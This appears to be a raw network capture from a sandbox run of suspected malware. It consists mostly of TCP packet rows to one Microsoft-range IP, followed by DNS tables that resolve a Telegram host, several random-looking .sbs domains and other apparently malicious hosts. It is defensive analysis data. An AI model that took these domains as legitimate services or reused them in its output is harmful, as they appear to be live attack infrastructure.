Oct 8, 2024 20:47:59.750236988 CEST	49985	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.750236988 CEST	49986	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.750271082 CEST	443	49986	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.750305891 CEST	443	49985	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.750365019 CEST	49987	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.750365019 CEST	49987	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.750365973 CEST	49988	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.750365973 CEST	49987	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.750365973 CEST	49988	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.750375032 CEST	49986	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.750396967 CEST	443	49985	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.750401020 CEST	443	49988	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.750425100 CEST	443	49988	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.750722885 CEST	49985	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.750722885 CEST	49985	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.750722885 CEST	49985	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.751132011 CEST	49986	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.751173019 CEST	443	49986	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.751209974 CEST	49986	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.751228094 CEST	443	49986	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.753572941 CEST	49991	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.753623009 CEST	443	49991	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.753695011 CEST	49991	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.753698111 CEST	49992	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.753745079 CEST	443	49992	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.753798008 CEST	49992	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.753840923 CEST	49991	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.753870964 CEST	443	49991	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.754653931 CEST	49993	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.754717112 CEST	443	49993	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.754740000 CEST	49992	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.754759073 CEST	443	49992	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.754784107 CEST	49993	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.754894972 CEST	49993	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.754920959 CEST	443	49993	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.754941940 CEST	49994	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.754961967 CEST	443	49994	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.755017996 CEST	49994	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.755141020 CEST	49994	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.755165100 CEST	443	49994	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.949856997 CEST	443	49990	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.950311899 CEST	49990	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.950330019 CEST	443	49990	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.952112913 CEST	49990	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.952116966 CEST	443	49990	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:59.967129946 CEST	49985	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:59.967158079 CEST	443	49985	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.055433989 CEST	443	49990	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.055501938 CEST	443	49990	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.055588007 CEST	49990	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.055706978 CEST	49990	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.055725098 CEST	443	49990	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.055736065 CEST	49990	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.055741072 CEST	443	49990	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.058080912 CEST	49995	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.058130980 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.058219910 CEST	49995	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.058326006 CEST	49995	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.058337927 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.060884953 CEST	49987	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.060913086 CEST	443	49987	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.510629892 CEST	443	49992	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.510948896 CEST	443	49994	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.511368036 CEST	49992	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.511393070 CEST	443	49992	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.511761904 CEST	49992	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.511770010 CEST	443	49992	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.511909008 CEST	443	49993	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.512222052 CEST	49994	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.512284994 CEST	443	49994	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.512533903 CEST	49994	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.512548923 CEST	443	49994	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.512677908 CEST	49993	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.512705088 CEST	443	49993	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.512983084 CEST	49993	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.512994051 CEST	443	49993	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.514899969 CEST	443	49991	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.520123959 CEST	49991	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.520139933 CEST	443	49991	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.520690918 CEST	49991	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.520697117 CEST	443	49991	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.612621069 CEST	443	49994	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.612693071 CEST	443	49994	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.612787008 CEST	49994	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.612835884 CEST	443	49994	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.612878084 CEST	443	49994	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.612958908 CEST	49994	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.613013029 CEST	49994	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.613013029 CEST	49994	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.613044977 CEST	443	49994	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.613065958 CEST	443	49994	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.613859892 CEST	443	49992	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.613929987 CEST	443	49992	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.613984108 CEST	49992	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.614106894 CEST	49992	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.614125967 CEST	443	49992	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.614137888 CEST	49992	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.614145041 CEST	443	49992	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.615446091 CEST	49996	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.615535021 CEST	443	49996	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.615621090 CEST	49996	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.615719080 CEST	49996	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.615747929 CEST	443	49996	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.615762949 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.615849972 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.616009951 CEST	443	49993	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.616074085 CEST	443	49993	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.616089106 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.616152048 CEST	49993	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.616167068 CEST	443	49993	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.616241932 CEST	49993	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.616241932 CEST	49993	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.616271973 CEST	443	49993	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.616305113 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.616342068 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.616632938 CEST	443	49993	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.616714954 CEST	443	49993	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.617821932 CEST	49998	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.617846012 CEST	443	49998	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.617847919 CEST	49993	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.617911100 CEST	49998	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.618019104 CEST	49998	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.618042946 CEST	443	49998	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.620121002 CEST	443	49991	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.620290041 CEST	443	49991	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.620362997 CEST	49991	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.620455027 CEST	49991	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.620455027 CEST	49991	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.620484114 CEST	443	49991	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.620507002 CEST	443	49991	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.622117996 CEST	49999	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.622138977 CEST	443	49999	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.622224092 CEST	49999	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.622315884 CEST	49999	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.622334957 CEST	443	49999	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.725025892 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.727488995 CEST	49995	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.727508068 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.727835894 CEST	49995	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.727844000 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.829732895 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.829756975 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.829844952 CEST	49995	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:00.829862118 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:00.829931974 CEST	49995	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.134387970 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.134402037 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.134464025 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.134649992 CEST	49995	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.134649992 CEST	49995	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.134710073 CEST	49995	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.134710073 CEST	49995	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.134735107 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.134751081 CEST	443	49995	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.137712002 CEST	50000	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.137742996 CEST	443	50000	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.137829065 CEST	50000	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.137995005 CEST	50000	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.138005972 CEST	443	50000	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.322782040 CEST	443	49999	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.323437929 CEST	49999	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.323498011 CEST	443	49999	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.324081898 CEST	49999	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.324095964 CEST	443	49999	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.327204943 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.327564955 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.327642918 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.327991009 CEST	443	49998	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.328015089 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.328036070 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.328295946 CEST	49998	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.328310013 CEST	443	49998	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.328613043 CEST	443	49996	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.328763962 CEST	49998	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.328773975 CEST	443	49998	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.328871965 CEST	49996	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.328885078 CEST	443	49996	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.329305887 CEST	49996	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.329315901 CEST	443	49996	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.422352076 CEST	443	49999	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.422406912 CEST	443	49999	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.422475100 CEST	49999	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.422499895 CEST	443	49999	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.422700882 CEST	49999	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.422734022 CEST	443	49999	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.422755003 CEST	49999	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.423029900 CEST	443	49999	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.423110962 CEST	443	49999	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.423166037 CEST	49999	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.426011086 CEST	50001	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.426100016 CEST	443	50001	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.426234961 CEST	50001	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.426351070 CEST	50001	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.426376104 CEST	443	50001	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.429861069 CEST	443	49998	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.429927111 CEST	443	49998	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.430008888 CEST	49998	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.430042982 CEST	443	49998	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.430072069 CEST	443	49998	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.430103064 CEST	49998	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.430131912 CEST	49998	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.430170059 CEST	49998	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.430202961 CEST	443	49998	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.430227995 CEST	49998	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.430242062 CEST	443	49998	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.431595087 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.431654930 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.431704044 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.431754112 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.431780100 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.431814909 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.431839943 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.432672024 CEST	50002	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.432693958 CEST	443	50002	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.432785988 CEST	50002	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.432894945 CEST	50002	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.432919979 CEST	443	50002	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.433587074 CEST	443	49996	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.433610916 CEST	443	49996	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.433661938 CEST	49996	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.433676004 CEST	443	49996	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.433733940 CEST	443	49996	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.433784962 CEST	49996	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.433839083 CEST	49996	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.433870077 CEST	443	49996	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.433893919 CEST	49996	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.433907032 CEST	443	49996	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.436091900 CEST	50003	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.436120033 CEST	443	50003	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.436187983 CEST	50003	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.436297894 CEST	50003	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.436306000 CEST	443	50003	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.517647982 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.517729044 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.517772913 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.517790079 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.517819881 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.517859936 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.517863035 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.517935991 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.517970085 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.517991066 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.518013954 CEST	49997	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.518024921 CEST	443	49997	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.520327091 CEST	50004	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.520426989 CEST	443	50004	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.520517111 CEST	50004	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.520665884 CEST	50004	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.520699978 CEST	443	50004	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.835813999 CEST	443	50000	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.836534977 CEST	50000	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.836564064 CEST	443	50000	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.837111950 CEST	50000	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:48:01.837116957 CEST	443	50000	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.941972971 CEST	443	50000	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.942013979 CEST	443	50000	13.107.246.60	192.168.2.5
Oct 8, 2024 20:48:01.942065954 CEST	50000	443	192.168.2.5	13.107.246.60

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 20:47:17.945424080 CEST	192.168.2.5	1.1.1.1	0x7a6b	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:18.872752905 CEST	192.168.2.5	1.1.1.1	0x5a2f	Standard query (0)	kasm.zubairgul.com	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:39.410130978 CEST	192.168.2.5	1.1.1.1	0x2102	Standard query (0)	nsdm.cumpar-auto-orice-tip.ro	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:41.100821018 CEST	192.168.2.5	1.1.1.1	0x8075	Standard query (0)	drawwyobstacw.sbs	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:43.000000000 CEST	192.168.2.5	1.1.1.1	0x59c9	Standard query (0)	mathcucom.sbs	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:43.117974997 CEST	192.168.2.5	1.1.1.1	0xfa10	Standard query (0)	cowod.hopto.org	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:44.047183037 CEST	192.168.2.5	1.1.1.1	0xe208	Standard query (0)	allocatinow.sbs	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:45.179809093 CEST	192.168.2.5	1.1.1.1	0xd974	Standard query (0)	enlargkiw.sbs	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:46.309140921 CEST	192.168.2.5	1.1.1.1	0x4ddf	Standard query (0)	resinedyw.sbs	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:47.659980059 CEST	192.168.2.5	1.1.1.1	0x68d1	Standard query (0)	vennurviot.sbs	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:48.770104885 CEST	192.168.2.5	1.1.1.1	0xc35b	Standard query (0)	ehticsprocw.sbs	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:49.065663099 CEST	192.168.2.5	1.1.1.1	0x7783	Standard query (0)	condifendteu.sbs	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:51.091222048 CEST	192.168.2.5	1.1.1.1	0x9bc2	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:52.417807102 CEST	192.168.2.5	1.1.1.1	0xd9e4	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 20:46:57.753175020 CEST	1.1.1.1	192.168.2.5	0x6622	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 20:46:57.753175020 CEST	1.1.1.1	192.168.2.5	0x6622	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:12.711240053 CEST	1.1.1.1	192.168.2.5	0x7b55	No error (0)	shed.dual-low.s-part-0032.t-0009.t-msedge.net	s-part-0032.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 8, 2024 20:47:12.711240053 CEST	1.1.1.1	192.168.2.5	0x7b55	No error (0)	s-part-0032.t-0009.t-msedge.net		13.107.246.60	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:17.955301046 CEST	1.1.1.1	192.168.2.5	0x7a6b	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:18.886693954 CEST	1.1.1.1	192.168.2.5	0x5a2f	No error (0)	kasm.zubairgul.com		95.164.90.97	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:39.444106102 CEST	1.1.1.1	192.168.2.5	0x2102	No error (0)	nsdm.cumpar-auto-orice-tip.ro		147.45.44.104	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:41.132107973 CEST	1.1.1.1	192.168.2.5	0x8075	No error (0)	drawwyobstacw.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:41.132107973 CEST	1.1.1.1	192.168.2.5	0x8075	No error (0)	drawwyobstacw.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:43.015165091 CEST	1.1.1.1	192.168.2.5	0x59c9	No error (0)	mathcucom.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:43.015165091 CEST	1.1.1.1	192.168.2.5	0x59c9	No error (0)	mathcucom.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:44.059806108 CEST	1.1.1.1	192.168.2.5	0xe208	No error (0)	allocatinow.sbs		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:44.059806108 CEST	1.1.1.1	192.168.2.5	0xe208	No error (0)	allocatinow.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:45.229815006 CEST	1.1.1.1	192.168.2.5	0xd974	No error (0)	enlargkiw.sbs		104.21.33.249	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:45.229815006 CEST	1.1.1.1	192.168.2.5	0xd974	No error (0)	enlargkiw.sbs		172.67.152.13	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:46.334476948 CEST	1.1.1.1	192.168.2.5	0x4ddf	No error (0)	resinedyw.sbs		172.67.205.156	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:46.334476948 CEST	1.1.1.1	192.168.2.5	0x4ddf	No error (0)	resinedyw.sbs		104.21.77.78	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:47.680598021 CEST	1.1.1.1	192.168.2.5	0x68d1	No error (0)	vennurviot.sbs		172.67.140.193	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:47.680598021 CEST	1.1.1.1	192.168.2.5	0x68d1	No error (0)	vennurviot.sbs		104.21.46.170	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:48.783593893 CEST	1.1.1.1	192.168.2.5	0xc35b	No error (0)	ehticsprocw.sbs		104.21.30.221	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:48.783593893 CEST	1.1.1.1	192.168.2.5	0xc35b	No error (0)	ehticsprocw.sbs		172.67.173.224	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:49.088275909 CEST	1.1.1.1	192.168.2.5	0x7783	No error (0)	condifendteu.sbs		104.21.79.35	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:47:49.088275909 CEST	1.1.1.1	192.168.2.5	0x7783	No error (0)	condifendteu.sbs		172.67.141.136	A (IP address)	IN (0x0001)	false
